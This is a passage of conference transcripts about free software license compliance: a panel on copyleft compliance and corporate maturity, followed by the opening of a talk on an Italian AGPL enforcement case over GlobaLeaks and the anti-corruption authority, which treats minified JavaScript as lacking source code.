it's a cost if the organization is not mature enough to have figure out what is the business model on top of the code and the source code itself, but the moment that the organization is mature enough to figure out the business, the path to money, then being compliant adds up and helps you actually monetizing and making business. And I'll tell you this is the last thing, you can see the maturity of your organization by this question, when you start implementing compliance into an organization that is getting mature, but it's not quite there. The typical thing is, can I just use phosology? And it's like, kind of, if this is about your accuracy, then maybe it gets you 20% of the way, how about the red flags and the Christmas tree, then now you're going to have to go fix to make sure that the accuracy is high enough, right? And then, oh, I need to staff a team. Yes, you need to staff a team, because that's kind of important, right? So if you want to suck it up, you're going to suck it up properly. So get a team on board, because that's what you had to do to ensure that compliance envelope accuracy across the board. I think I'm going to spend the next five years paraphrasing Davide to say the mature companies should believe software freedom is part of their business model. So I know that's not exactly what you said, but you're sort of hinting at that, and I really like that. You can quote me on that. Oh, that's wonderful. I got to quote you on that for sure. So Miriam, I want to come back to you. Following up on something that Pidge said that I really like to hear you comment on, there has been this divide going back to when my career began in the 90s. So it predates even to heavy discussions of false compliance of engineers want to do what they want to do and get the product working and lawyers just get in their way. And lawyers give them instructions that don't make any sense. How are you looking at how we're going to do this going forward in the next generation? How do we get lawyers and engineers to talk together as equals who are working together on a team to do the right thing rather than being at odds with each other? How do you see that fitting into the future of compliance? I think one part of the solution to that might be to actually get lawyers to understand the technical backgrounds or at least understand the developers that they are talking to. I know there are some good projects even at university where they start to teach lawyers at least basics on development and software development and they at least have to pick that up. But I don't know if that's happening everywhere and enough. But I think that's one part of the solution so that you can actually understand what everyone is saying that you're talking to. The other thing I think is, again, maybe a solution for lawyers. They should start offering solutions and not just saying what doesn't work and trying to get them to find, to get to a solution together maybe. And at least I often find that when you explain the background and why some things are an issue or are a risk or whatever courts ruled on it differently, developers tend to understand that because they think really structured and in that regard very similarly to lawyers. So you get to a point where you can kind of get rid of the issues and focus on how you can move forward. I think rather quickly actually if you start at a point where you understand each other. Yeah, I definitely agree with that. So John, I want to turn back to you on that question. I think one of the things that we've tried to do in the activism world is that kind of connection you were talking about about why companies should really see it as their benefit to give software freedom to their users. And I so often see, and I'm sure we've all seen this, going back to Davide's point of the mature company, the less mature companies don't get this yet. So how do you see the words and requirements of the license, like what would you say to a company that's not mature that Davide is referring to? What would you say to them, John, about like to get them to stop focusing on just like meeting the bare minimum of the requirements and actually engaging in software freedom in a way that would benefit their company? Yeah, it's a question, I mean, I think part of it is to your company's robbing concern about reputation, you know, and I think that's definitely one part of the approach is to discuss that and the fact that this software constructed through sharing really is a community and it's in the company's interest to be a good citizen within that community and that will have benefits to them both depending on what business sector they're in, of course, but different kinds of benefits to them, one of which being when they do make a mistake, if they do make a mistake, there'll be a lot of community goodwill there, knowing that it was a mistake and plenty of people, including the Free Software Foundation, willing to help advise them on how to do things properly, as opposed to just filing a lawsuit. And I think so that the reputation and that kind of good citizen aspect is important. We'll also point to examples of where new and exciting things have been done as a result of the software being distributed to users and probably you've written about the things that have happened with the router firmware from that source code having to be released since it was built on another GPO code and that lets you knew your software that could be used by companies and put in their products and shipped. And then, of course, we want companies to be socially responsible and I think that is a persuasive argument in today's world especially and it's talking to companies about how do your employees care about this, your customers care about this, you as a hopefully human being that desires to be ethical in this world should care about this and try to approach it from that standpoint as well. So I think there's all of those, the reputation, the practical benefits and the ethical, socially responsible reasons to talk about. Yeah, so I want to go to Pidge then because Pidge, one of the things that I feel, I feel and you can confirm or deny if this is, if I've got this right, but I feel like when I look at what you're trying to do, you're basically trying to get the details right for what John is talking about. So and by that I mean, I see the kind of work you're doing is saying, well, yeah, I want to make companies be socially responsible, do the right thing with compliance, but I want to make it straightforward, easy and design well for their engineers, like build that connection that Miriam was talking about between the engineers and the lawyers understanding what needs to be done and make it as part of a rote task like doing good testing on your software and doing other engineering and software development practices. So can you talk a little bit, and remember that the FOSDA audience is pretty advanced. So if you can get a little bit in detail of how do you see we do that as a technical matter so that when you, so that someday when you start from Yachto, you know, if I started from Yachto, the thing on the other end is going to be that compliance source release and Yachto is going to give it to me or whatever project it is that would give it to me. So I'll give you an example of some of the last people we worked with for the past couple of years and we were doing compliance work with them. Every release and they were doing like, you know, scrum sprints. So it was like once every three weeks, every release for multiple machine firmware, all of that. And I'm going to defend FOSOLOGY here. It got, all of that got generated, thrown up on the FOSOLOGY site using the metal license tools layer and someone went through and someone who was familiar enough with the build system went through and did that work. And we found issues like, you know, because it wasn't a one off compliance thing. Okay. Yeah, we're done. We're released. Done. We don't have to do this again. It was a continuous auditing of the entire process and not just auditing. Did we go through and create a manifest? It was, did we go through, create a manifest? Did we go through, create a bill of materials? Do are all the metadata in the, which is the, the scripts that control compilation out there, not just for GPL stuff, but for MIT, for BSD, for all of it. Did we ensure that anything that was code embargoed because it was closed source license not make it out as well? Which is important, you know, because there is closed source stuff on this. And also how much GPL three is on that because embedded developer, well, not embedded developers, embedded manufacturers don't necessarily like GPL three because they have difficulty with some of the things if they're trying to do a box that's locked down. So you know, there was this entire process that we had to go through and we went through it once every three weeks and it was continuous. So when we start talking about compliance and thinking about compliance, we have to stop thinking about it as this one-off thing that we do in thinking about it as a continuous integration, continuous test, continuous audit and continuous testing of the stuff that comes out at the end. Is this usable for the end user? Is this something that's useful? What happens if Bradley comes knocking on our door? You know, when these are things that we all have to start thinking about what we were doing with this client of ours. So David, you're often in the position of being inside the company who would be a client to something like this. And I want to pick up on something you were saying about the mature company. We'll see that this is valuable. One of the things that we haven't really seen yet because we've seen so much, like we're talking about so much effort going into the build material stuff, we've got PID sort of doing your base firmware that you start from, AIDS compliance that PID was just talking about. But when do you think a company like Huawei can get to the point where it doesn't just want to participate upstream in Linux, like the full upstream, which I know it does, but wants to be participating in things like let's make an entire firmware that everybody is collaborating on instead of each company doing their own firmware. And then that would mean, of course, less going back in and trying to get that firmware into compliance if everybody's using that same firmware base. How do you think we can get there? And can we even get there? Or is this divide between upstream and final build going to continue to be so wide? No, I think it's going to go on. And it's about deep fragmenting and deep fragmenting and deep fragmenting and deep fragmenting, if I take the auto project and I've been lucky enough to be one of the founding fathers back in 2010 when I was at Wunderber, right? So that's how I know our friend here. And it was about creating one common set of technologies and tools for deep fragmenting the embedded device industry, meaning that it didn't reinvent the wheel, it didn't recreate the Linux kernel, bash, Apache, boa, whatever that is, it didn't reinvent BigBake, but it really creates an ecosystem, a sandbox where partners with the same goal in mind shared that effort so that each and every one of them could benefit in the end, right? And so that is this broad. Now that goes to Huawei. As a matter of fact, my team is responsible for launching in Europe Open Harmony, which is the Huawei-led open-trist initiative to create an operating system that powers consumer devices. So this is Yachtso, consumer devices is this, right? So it's not the entire industry, but it's this. So we are using a leverage in BigBake, Yachtso LTS, but now we also need to support smaller devices that use Zephyr. That's another project, right? So now we get together consumer companies, device makers just like Huawei, Samsung, LG, just making names up, right? Just to give an example, Bosch, Siemens, LG, Sony, et cetera, et cetera. And now you're defragmenting the consumer device industry, meaning that you're not creating something called open harmony, right? But it's an open-source play with those companies re-use Yachtso, tailor it to consumer devices and defragment that industry. And they all participate in that open-trist project in the compliance activity that we just mentioned so far. And at that point, once you have consumer companies just working together, right, to defragment the industry, it's very easy because consumer companies are B2C, so they serve the end consumer and you are at the end of the chain, right? So I think we're going to proceed by defragmenting and defragmenting and defragmenting. And so long as this compliance envelope traverses this defragmentation effort, you will see participation. But defragmenting has to be there as a business goal, right? If there's no business goal in defragmenting, then participation is now going to be possible. That makes sense to me. I want to go back to Miriam now because when I continue to hear all of everybody else here talk, I want to sort of see what the lawyers are saying because one of the things I've noticed is the lawyers are actually end up being on the front lines of this because the first time they realize they have a compliance problem, they're going to make a comparison to GDPR, which of course we in the US where I'm based have to comply with because we give services to Europeans. And while even for an organization like the one I work for, where we really care about the goals of GDPR, it's still a pain to comply with GDPR. It's still work to be done. And every once in a while, I'm like, oh man, we really have to do our website that while GDPR says we have to. So Miriam, I want to ask you how much, I'm not going to make you say percentages, but give us a sense of our companies where Davide is trying to say they ought to be and trying to build these firmwares or are companies coming to still coming to look at open source and free software and saying, darn, it's annoying thing I have to comply with that I'd rather not have to do. Why do I have to do it? What's the majority of what you're seeing and what do you tell them to move them from one side of that to the other? Again, as I said before, for, you know, what risks do they see? I think the spectrum is just as wide on that area. So I've had clients say, yeah, we are now facing enforcement and actually we knew we had a problem there. We should have fixed it. We just didn't have the manpower to do it. Or we had to focus on GDPR on whatever else. And we had to put our teams there. That's kind of the middle. And then you have on like the upper end of the spectrum, you have companies coming in saying, we know there's open source software. We know we are not using it as much yet, but we know we're getting there. We're actually getting into the software business now as well. And we want to comply just for the sake of complying because we think it's the right thing to do and we want to focus on that. And then on the other end of the spectrum, you still have a few companies that are really troubled by the idea or don't understand the reasoning behind it. But they usually get to a point where they say, well, it does make sense and I think we have to comply rather quickly. But again, it depends certainly on the companies they're talking to. I have to say I'm impressed how it has changed over the last years. It has gotten a lot better and a lot easier to sell compliance and to sell that they have to work on compliance. Most of them are really already at a point where they know they have to fix whatever issues they have and they just need to find a solution. So I'm certainly glad to hear that things are changing. I tend to be an eternal pessimist and think that it's not going to get better. But I also want to throw the same question to John. I mean, John, do you feel like at the end consumer level, people who get these devices, do you feel that we're getting to a point or moving towards a point where people feel empowered like they do in the wireless router market? Because most of the wireless routers you can install an alternative firmware that's completely free software. I know from my work that that doesn't exist in any other sub-industry. Do you see it moving in that direction? Is Davide's dream getting there as Miriam Wright that the companies are moving or do we have a lot more work to do? And if so, what's that work, John? I think we have a lot more work to do. I think that I agree that there is much more widespread awareness. You can tell we're not in Brussels in January because I have just done it in my face. But yet you there's much more widespread awareness of free software and what it is and much greater willingness to use it and engage with it. I think that I do see the problem from a end user perspective is that there are so many other forces now pushing towards locking down devices for different reasons and also just so many more kinds of devices. Now I'm not just can you rebuild the software on your laptop or your desktop or even your router, but your phone. If you have an iPhone which has free software on it, you can't really install your own. You can technically apply and be a developer and install some of your own software. But there's no way to have a marketplace for free software on that device because it's prohibited. And so there's a lot of other pressures working against user freedom. And that's one big area where we have a lot of work to do. We have a certification program respects your freedom where we're trying to promote businesses that do embrace fully 100% the notion that all the software on a device should be free. When it comes to compliance, it's, you know, I do worry a bit about the kind of it's good enough or our approach is good enough. We check enough of the boxes that we're going to reduce our risk. And that's what we're aiming for. I would like to definitely see more adoption of the actual values behind all this and just more understanding that most of these compliance challenges arise because of the common because of the attempt to combine proprietary software and free software. So, you know, we want to encourage people to push the envelope in the other direction as opposed to trying to see how much proprietary software you can get away with distributing alongside the free software with the free software, you know, push it in the other direction and see how much of your software you can distribute as free as a solution to the compliance challenges makes them a lot easier. And so the risk is saying this is all Pidge's job to solve. Like I do want to ask Pidge, like, like, how, like, how do you do that process with like a client when a client comes to you and they're having embedded firmware and it's a mess and you're trying to tell them switch the octa do this. Are you able to get through to them to the other side where there is a big advantage and change them into that mature company that we've been talking about, get them to care about the end user installing it? Or are you or do they just come to you and say fix my problem so I don't have to think about it again and I don't want are they telling you help us lock down your device? Are you having to push back with your clients about that? Yes and no. I think that what a lot of the people that I have talked to, they understand that either this is the right thing to do and not necessarily for moral or ethical reasons, but for entirely selfish reasons. You see this kind of in like some of the EU things with GAIA acts where they want privacy and open firmware all the way down to the chip level because they don't necessarily trust close binaries, close bobs on the chip. You don't trust that. So I think that from a lot of folks, it's coming from either a I never want to get that email from Bradley or I never want to do this where I get kind of called out for using open source software in my products and not doing it. So like most of the folks that are there aren't fighting this, like the ones that I'm dealing with, but no, I'll ask you that. Those are the folks who are coming to me already. So it's the ones that are coming to folks that are the ones that we worry about, right? They're the ones who either don't think that they have a problem or don't know that they have a problem. So the ones that I talked to are already on board. So that brings me over to Davide and probably asked the hardest question that just has to be asked because Huawei is not a company that's known for its transparency. It's had some trouble with that. It's been accused of spying. It's been accused of doing things in the firmware that we in the free software world have always argued. Well, if your software is free software, we can check and verify. Do you think that's going to be an argument going forward inside your company to say if you do this and allow the users to rebuild and reinstall the firmwares on Huawei devices, I would argue that it gives you a great answer to the problems the Huawei has faced. But I'd like to give you the opportunity to kind of address that and how do you connect up the transparency and other issues that Huawei has struggled with with the transparency and user freedom that is inherent in FOS as you become a mature FOS adopting organization. Yeah, I think the answer is all in. So it's Huawei in first person, right? Huawei can be considered a person, a juridical person, right, has been particularly hit by services being pulled off or pulled away for the nature of known free services, right? So if a player in the industry feels that by using known free software, then your business is going to be impacted, then, I mean, no, let's use free software. Let's use open source software. Not only that, if by using and by doing free software and participating in a community as an active open source citizen, now all of the bad marketing that I'm getting, right, it's going to go away because I contribute first, I participate second. Now all of a sudden I'm using technology that everybody uses and contributing technology to the world. I'm not vendor locked in anymore. My brand in terms of transparency, protection of IP, et cetera, et cetera, you know, just gains value, I mean, all in, right? So in essence, that's the reason why my group was created. In essence, that's why after years and years and years of career in open source, you know, many companies in the US and Europe, Huawei came to me and said, listen, we're all in in here. Can we build the open source technology center in Europe and be all in when it comes to open source because it's good for us, it's strategic, it's good for the world, so let's go for it, right? I'm saying selfishly, selfishly, open source is really good, it's the strategy, it's the real strategy. Okay, well, we're coming towards the end of the session and so to make sure that everybody gets a chance to say what they want to say, I want to go through and give everybody a minute or so to say whatever, something I didn't ask as moderator that you really want to make sure we covered or that you wanted to bring up. And I've been keeping track of people who have seen me looking over to their side about time. Miriam's had the least amount of time to speak, so I'm going to start with Miriam. Is there anything you wanted to say about FOSS compliance that we didn't get to? Yeah, one point I had been meaning to make before when you were asking John and Pidge, actually. I think one thing, one development that I really like is that companies are looking a lot more into contributing back and getting engaged into open source software projects, not only using but also looking at the other side. I think for many companies, that's still a bit harder to look into that and to figure out where do I get engaged, what makes sense, where do I put my teams, what do I look at, but it's happening a lot more and at least we do get a lot more questions around that and I think that's a good development in this space. Thank you. So John, do you have anything that we didn't cover that you wanted to make sure was brought up? Yeah, I think that we're talking about compliance in particular with Copy Left and I know that a lot of people are talking about sustainability right now when it comes to the free software that they depend on, learning that the projects they depend on are maybe only maintained, actively by a couple of people and are in a precarious situation. And I just want to emphasize how important we think Copy Left is to sustainability. Copy Left is the thing that ensures that free software will be getting more free software as opposed to more of a mis-sic licenses that put software out there that can then just be used to get proprietary software to market quicker and that really undermines the sustainability of the whole system that businesses are being built on. So that was one thing I wanted to make sure was out there and I just wanted to offer our help at the FSF and we do our best to maintain good kind of best practice documentation which helps establish community norms and make all this a lot clearer for people and we do a lot of kind of unsung work for improving licensing hygiene and the projects that we noticed. We even did a little bit with Big Blue Button actually that helped them clean up a few things with their licenses. So, you know, we're here to help. You can always contact us at licensing.fsafe.org. And I just want to encourage everybody to go as far as you can to push the envelope as far as you can. You know, don't lock down the device even if you think you might be able to get away with it. Embrace the idea that people can do and do creative things with your products that will then probably benefit you in the long run as well as well as just being a socially responsible thing to do. And I can't help but jump in to say that free software builds for devices make the devices life last longer and it's fewer devices ending up in landfills which is another type of sustainability problem. And I want to go to Pidge and ask if there's anything you wanted to add to it. I didn't ask or something about cost compliance. You wanted to tell everybody? No, but I do want to second that in that if you are using open source and building a business on open source, it needs absolutely no sense from a business perspective to starve open source. So, if you are using a lot of open source and not contributing back either financially or patch is welcome, start doing that now because it is a business sense thing. It just makes business sense. On top of that, if I'm relying on things from a security perspective that there's three people who work on the project and only one of them is getting paid to work on the project, that's an issue and as open source, we need to get the larger utilizers of open source to start contributing back more and more. Davide, anything you wanted to make sure we covered that I didn't ask about? No, I think you asked all the hard questions. You gave me a chance to reply. So, it's great thing. So I'm just going to compliment what was just said. I mean, when it comes to contributing open source software, it's so business and ecosystems are created for, ecosystem is created for business reasons. I mean, companies get together because there's a business sense. But because there's a business sense, mature organization measure the number or the efficiency of a project in terms of decreasing contributions or increasing contribution. Meaning, if I'm the first to start a project and I get a second partner, third partner, fourth partner, fifth partner, I'm contributing 70%, 80%. Over time, I want to see that going down. I want to see that evenly distributed. Because if it's not evenly distributed, A, I'm the bully of the ecosystem. It's not open. I'm dominant. It's not good for marketing. And it's not efficient for me. So back to mature organization, it's about contribution. It's about being all in and it's about sharing this burden together of contributing together and building something together. So that's how businesses think if they're mature enough. Thank you all so much for being here. I'm going to go round and round about with everybody one last time and just give you a chance to say any URL or project that you want to promote to have people to look for further information. I'll start with Miriam. Anything you want to promote or ask people to take a look at? We actually had to have at least one time someone saying you are mute now. Sorry about that. Sorry. Now I have to think there is actually a GDPR project that is open source. I think it's the French authority that's putting out a lot of open source software around GDPR compliance. So maybe plug them because I think it's a good idea to do that. John, is there anything you want to give a URL or something to promote for folks to take a look at? Oh, he's on mute now too. Second time. Yeah. I think maybe we will actually have an announcement shortly about a continuing legal education series online to go with our conference, neighbor planet and marsh. And that's one place for every try to help lawyers, especially from corporations, advanced business owners in this area and also get this kind of time talking with each other. If we're going to do an online version of that, shortly just watch FSF.org for more information. Did anything you want to promote as we wrap up? The Octa project as always because I have to. But also I'm working on a new project called Network Great Linux. It's going to be announced in a few weeks. But look for that coming out soon. And Davide, you get the last word, anything you want to promote that you're working on that you want folks to take a look at? Yachto project, Zeffra project, Linux foundation, the Cliff Foundation, Free Software Foundation, open harmony. You guys have funded FOSDEM and that's it. You guys keep up the good work. This is going somewhere. I want to thank all our panelists for doing this difficult, difficult remote panel and we're so glad that you joined us and we hope that next year in Brussels we'll all be together and be able to go out to dinner after our panel then. Thank you all for being here. Thanks, Brad. Thank you. Thank you, Bradley. Goodbye guys. It was a pleasure. Bye.
|
Compliance with Open Source and Free Software licenses remains a perennial topic of discussion among policy makers in our community. However, little attention is paid to the motivations why these licenses have specific requirements. Specifically, at least for copyleft licenses, the licenses seek to bestow specific rights and freedoms to the users who receive the software integrated into the devices they use. This panel, containing a group of industry experts, consultants, and license enforcement experts, discusses the challenges and importance of assuring downstream can actually utilize the compliance artifacts they receive with products as intended by the license.
|
10.5446/13945 (DOI)
|
Thank you. My name is Carlo Piana. I'm a lawyer in Italy. I've been involved in free and open source software matters since the early years of this century. Maybe some of you know me from my work with the Free Software Foundation Europe and the European Legal Network and many other initiatives. I am founding partner of ARRAE, an IT law firm dedicated to information technology law and especially free and open source software licensing and compliance. Today we are presenting a case which we regard being the first GPI case in Italy, heating and court room. That is interesting because also it involves the public administration distributing the software and this public administration not only enough is the national anti-corruption authority. It's a happy ending story, fortunately. We brought them to compliance. We agreed on compliance after nearly two years of discussion. I'm going to be held by my friends and colleagues, Fabio Pietro Santi, President of the Herman Center, the producer and the manufacturer of Global Leaks, also the client and my colleagues, Giovanni Battista Gallus and Alberto Piennon, both our partners of ARRAE too. Without any further ado, I will hand over to Fabio. Fabio, please introduce yourself, Herman Center and Global Leaks. Thank you. Thank you, Carlo. The Herman Center for Transparency and Digital Human Rights, it's the NGO that in 2012 started up the Global Leaks Whistleblowing software, that's a free software project, working towards the protection of whistleblowers. And that started just after the WikiLeaks Collateral Murder Facts as a way to find out how NGOs journalists and also public agencies and corporations can provide better protection to whistleblowers. This software is an AGPL license and it's being used by a variety of users within the different NGO and the journalistic sector, in particular within the anti-corruption NGO. And in that context, we started working with Transparency International, the key NGO existing in more than 110 different countries and with the anti-corruption bodies that are public agencies looking at the fight of corruption. In that sense, we found ourselves in reading public consultation by the Italian National Anti-Corruption Authority while we were already working and supporting the Transparency International Italy chapter by improving the Global Leaks free software in order to look at that direction of anti-corruption activism. And we were very direct in answering the public consultation with our insight and advice. This led us to start an informal cooperation that became a formal cooperation without any economic basis entirely done on a pro bono basis in developing a set of features that was useful for ANAC, the Italian National Anti-Corruption Agency and possibly for all the Italian public agencies that had to deploy a whistleblowing system in the fight of corruption because in Italy the law requires public agencies to provide a secure reporting channel for the fight of corruption. So we spent months of dedicated development and interaction with the anti-corruption agency making improvements following needs that we spotted from the underlying meeting that we had with them to understand how can we make Global Leaks too far the revolve in serving the anti-corruption world, not just in the NGO Activistic sector but also in the regulatory body that looked forward the support of public agencies and corporations. In that ANAC had a very good vision. They were very well prepared technicians there and with our CTO and lead developer Giovanni Pelerano we went undergoing more than 20, 24 different features set and improvement to the software with alteration between their manager and board and their technician and different legal officers and achieved a set of functional release of the software. The code name of the software was open whistleblowing and interesting enough that we heard informally that someone inside the public agency that's a large and powerful central public agency didn't like the word leaks part of Global Leaks because remembering we elix and the internal decision was to use a code name open whistleblowing. Fair enough we are working to make the world a better place to stay so it's fine to have this kind of code name. So we worked with them until we decided together they decided that it was the time to publish the modification that we did to the software. Most of them was already being committed upstream into the main global software now being used by thousands and thousands of public agencies in the world not just in Italy. But some of them was some hard patch that we put into the code and this was put uploaded, committed into the GitHub profile of ANAC slash Antico Ruzione on GitHub under the code name open whistleblowing and we did it. So what happened next? It happened next that well there was a tender to move it forward rather than developing in a community oriented way and with an iterative evolutionary approach to the software like going iterative with a beta approach. And you know public tender became very nasty and very complicated. And basically we found that most of our pro bono work was ended in the hands of the winner of a very bureaucratic public tender where as an NGO it's also quite difficult to provide the very same requirement. In the tender it has been written to support a deprecated version of the Microsoft SQL server. And it was against our vision also to look at the direction of supporting the procated software into global leaks that are secured by default and very well open source component integrated piece of free technology. And so in the end what happened next? I mean, John Matista Gallo can explain better than me. Thank you very much Fabio. So my role is to describe what happened and how we managed to obtain compliance with AGPL and we leave to Carlo and Alberto the details of the most important legal issues. So as far as we know this is the first case of first time that any GPL compliance case has been brought before an Italian court and one of the very first cases involving compliance from a public and asked from a public administration and so I think it's quite interesting even if we reached a settlement so not a decision. So what happened? Global leaks which was developed the protocol type was uploaded on GitHub in 2016 and together with AGPL with Elias Sensen plus the reasonable legal notice as we under article 7b powered by Global Leaks so additional terms under article 7b and Hermes said an agreement with ANAT the Italian Anti Corruption Authority as already pointed out mentioned by Fabio and so post on to this agreement Hermes gave an at control of the GitHub account and then the C decided to issue a public tender for the development and maintenance of this prototype and after quite a while in 2019 so a few years after they after they published in the project repository a derived version which was called OpenWizTemblowing and there were however several issues because the AGPL license was gone and it was replaced with a European Union Public License 1.2 and also the reasonable legal notice was removed there was only the authors note and some of the corresponding source as defined in article 1 and 6 of the license was not completely available and also OpenWizTemblowing was adopted by several public administration and of course it was adopted in the incompatibly licensed flavor so to speak so what happened next? Carlo Piana our friends started writing to ANAC several times trying to keep his composure is known well known composure to be as calm as possible and never asking for damages but only to asking for compliance on behalf of the Hermes centers and however the answers of ANAC were not so exactly friendly and of course they stated they were not infringing anything but the compliance was not obtained because they stated they were not in they were not they were absolutely respecting abiding the license and the change of license was perfectly legal and so the violation was ongoing and so Hermes could have by itself of the close 8 article 8 of the AGPL so which provides for the termination upon violation but also provides that if the violator cures the violation within 30 days of the notification then the license is permanently reinstated but in this case ANAC in our in the proposition of of Hermes was still in in breach didn't cure the violation so article 8 was clearly triggered and the termination was clearly triggered and Carlo tried to explain this also once again writing to ANAC but they still stated they were perfectly compliant however after a certain time they published a commit after the license was terminated relicensing open with same blowing as AGPL V3 but there was still no compliance with regard to the reasonable legal notice and also with regard to the corresponding source however after a while after the proceeding I will mention in a while has started they also published part of the corresponding source especially of the client not in a minified version as they as they did before but of course in the Hermes position the license was already terminated and only Hermes was only the copyright holder so Hermes could reinstate the license so and at any rate still there was no compliance on the other issues so there was no alternative and Hermes started legal proceedings before the tribunal of Milan Carlo and Alberto will deal in depth with the issues of licensing compatibility termination and minified code I will keep just on telling the tale which is I think very interesting and what did he do? He asked for a preliminary injunction under the Italian copyright law and the judge was asked to assess the non-compliance and grant on injunction on what term the injunction was to cease and desist for any use accessible to the public or any publication of the derived work until and that condition imposed by a GPL with a license and with additional terms were met and also with a subject to their reinstatement of the license by Hermes and was asked also for a penalty for every day of non-compliance and it was also asked to order an act to publish the court decision not only in the way provided by the Italian copyright law but also in the web portal of the authority and in the GITAB repository and also to notify the decision to all public administration which asked for a use of the derivative work and in this case in the legal proceeding the authority unsurprising enough denied to be non-compliant and strongly stated that relicensing under the UPL was perfectly legal and also stated that the additional terms were not applicable and the corresponding source obligation were met and as I already stated the corresponding source was published but after the proceeding were started and it is very interesting to point out that there was no objection or even any discussion about the legal validity or the binding nature of the AGPL provisions so it was just a matter of the interpretation of this provision and if there was compliance or not. It seemed that the parties were very really a world apart but then Carlo had a trick up his sleeve and he made a settlement proposal that they absolutely couldn't refuse and so to put it briefly and not exactly in legalese he's proposed okay you get the license right you publish the corresponding source just go one step further add the additional terms and we will restate the license and everybody will be happy at the end and at this point after some back and forth also before the judge in Milan the authority agreed and the settlement was done out of court and we issued the all Hermes and the authority issued a joint press release and so really everybody was happy so what is the most important lesson to be learned well I leave it to Carlo and Alberto to sum it up and I thank you all and I hope to see you soon in the very next future. Thank you Giovanni. Lesson learned. The first lesson I personally learned from this ordeal is that we lack education. We must produce better information more accessible information and we spare we have to spare no effort to bring ordinary people to sufficient level of knowledge. We have won the battle of having free software mainstream dominant in certain places but that has not been followed by sufficient degree of education and we have learned it the hard way here because we approach the county authority and they said no we're not infringing on any of your copyright we insist on explaining making reference to documents and say oh look you might know that this is open source now it's copy left meaning that there are no conditions for reusing the software which is strikingly the opposite of what we'll learn and something we have not heard in the last 20 years. So going forward and trying to explain again my position as a somewhat expert of this matter writing books, writing articles, being an editor of a review, general counsel of the foundation, teaching things at the university, a master course and university degree they came up with something more elaborate like oh the EOPL is compatible with the EOPL because there's a blog telling that. Actually there was a blog reporting that EOPL is compatible but without mentioning in which direction so inbound outbound both no explanation actually the official documentation of the EOPL that is quite well explained how to combine EOPL code with the AGPL but there was in English information possibly behind a linguistic barrier. So that is the lack of easily consumable maybe translated documentation of the basic concept that we have teaching and we have practicing in any day in a compliance exercise it's important and indeed in any compliance efforts we are making we are offering basic crash course 101 course on IP software copyright and copy of concepts so that we have a basic understanding even for technical people and actually this dev room the legal dev room in technical and community event as fostering goes in the right direction and I praise those bringing the idea of a legal dev room. Second lesson there is a still misconception on what source code is. We said you are not distributing the source code of the interface and I said no look there is a source code you can read it and well that is a misconception derived from a lack of knowledge of what minification is. The file was minified and I will leave to my colleague Alberto who is going to dig deeper in this aspect. Alberto please have your presentation. Thank you very much Carlo and hello everyone. I appreciate that most of you may be familiar with the concept of JavaScript minification so please forgive me in advance if some parts will sound commonplace to some of you. It's just to get a non-technical audience to understand. So basically our claim about the JavaScript part of open-wisted glowing was based on the fact that unlike the original repository source code offered for download by the defendant was the JavaScript front end of open-wisted glowing like served minified in some parts everything concatenating into a single huge file. The defendant contended that this was still a source code distribution and that it was compliant with the AGPL requirements. Obviously we claim that this was not the case. How the notion of source code is by the defendant compared with the legal definition of source code provided by the AGPL. Well AGPL as we all know defines it as the preferred form for making modifications to the code itself. Following this definition a single huge minified JavaScript file cannot be regarded as source code. Why? Well the first fundamental notion here is that JavaScript is an interpreted programming language. Interpreted means that JavaScript doesn't need to be previously translated into machine language in order to be executed but as the word says it is translated into machine language by the computer equivalent of a real-time interpreter and immediately executed by the machine itself. This is indeed very different from the distinction between object versus source code in compiled programming languages like C, Java and others. Where human readable source code needs to be previously compiled and therefore translating to the machine language in order to be understood and actually executed by the machine itself. As we all know with compiled languages a software program may be distributed in two different forms source code for or machine code for. The latter may be also called depending on the context object code or executable code. On the other hand technically speaking with interpreted languages we normally distribute only source code. There is no such thing as object code distribution in interpreted languages and this is the case also with JavaScript. Well actually some modern JavaScript interpreters do compile code before executing it but such compilation is intended just for browser specific internal use and not for distribution so the conclusion doesn't change. Summing up technically speaking the defender was right. Whatever you do with JavaScript you always end up with source code. It's materially impossible to distribute JavaScript object code because it simply does not exist. In that form. But does this hold also in the legal field? To answer we need to make a step forward. While JavaScript cannot be distributed in compiled form it can be minified. But does that mean? I will make you the same example that we made to the judge at the trial hearing. What you see on the screen now is a simple code snippet written in JavaScript. It's a simple function that returns user data given their ID number. What this code does is straightforward to anyone who reads it because the function and variable names just tell it. Get user data, user ID, get user and so on. It's almost like plain English and if there's any doubt left the comment that you see in the code qualifies it. But let's assume that this code for some reason is too long and takes too much to download and execute. Since function and variable names are arbitrary we can just substitute them with single letters. And since comments are not executed and are simply ignored by the machine we can just strip them out. The result may look more or less like what you are seeing now on the screen. So this essentially is what minified JavaScript is all about. To save space and to speed up code download comments and white space are stripped out and function and variable names are replaced with random letters so the code gets much shorter and lighter to download. The problem is that now the code looks totally incomprehensible. From a machine the two codes are functionally equivalent. But for a human the first one is something that one can understand and possibly modify but the second one is something that could be understood and modified just in theory but in practice it would be as difficult as solving a very complicated puzzle. Most software developers would even try. So is that still a source code? Technically speaking yes. Since it still needs to be interpreted in order to be executed on a machine. Is that object code technically speaking no since there is no such thing as object code in JavaScript. But legally speaking things are different. All GPL licenses namely GPL, AGPL, LGPL at section one provide that I quote the source code for a work means the preferred form for the work for making modifications to it. Object code means any known source for a work. So given these definitions the answers to the above questions completely change. Is JavaScript modified code still source code in GPL and AGPL params? No because it's definitely not the preferred form for making modifications. Is that object code yes because it does not fall into the above definition of source code. So the final question is am I violating the GPL if I distribute GPL JavaScript code only in minified form and I do not even offer to provide the original no minified code. Yes I'm violating it because I'm not complying with the obligation to provide the full source code. It's just as simple as that but it's something that is often overlooked by developers and not only in this specific case. The distribution of JavaScript code only minified form is something that we often see in our open source compliance practice. But when the license GPL this is simply something that one is not allowed to do. And this is so not only because it was our defense in this case but because it is a clear cut statement of the GPL that cannot be subject to different importations and probably will hold true also for other license that do not explicitly define source code. Actually in our case also the defendant had to admit that in the end and we finally obtained a true source code of open-wrestled-glow-in-front-end no minified divided in smaller source files. Now just let me pass you back to Carlo on the conclusion of the case and thank you for your attention. Oh thank you Alberto that was really informative. And the final point I want to touch upon briefly is on the additional conditions that global leagues as attached to the AGPL. So the AGPL was not vanilla. We won the authority restore the AGPL despite it was terminated but that is another story. They used the exact version taken from the Free Software Foundation website. Here there was a contention by the state of attorney not on the fact that the actual disclaimer that we wanted to put it reasonable notice that we wanted to have restore was or not complying with section 70 of the AGPL but they contended that the version they have ported from did not contain the mention that we required. Actually we were lucky because on the one hand we kept a copy of the repository that they have ported. Actually they didn't they haven't ported the repository. They took the code and put into a single large commit with everything already done. But we had the original version with the commit history. On the top of that we have been able there was 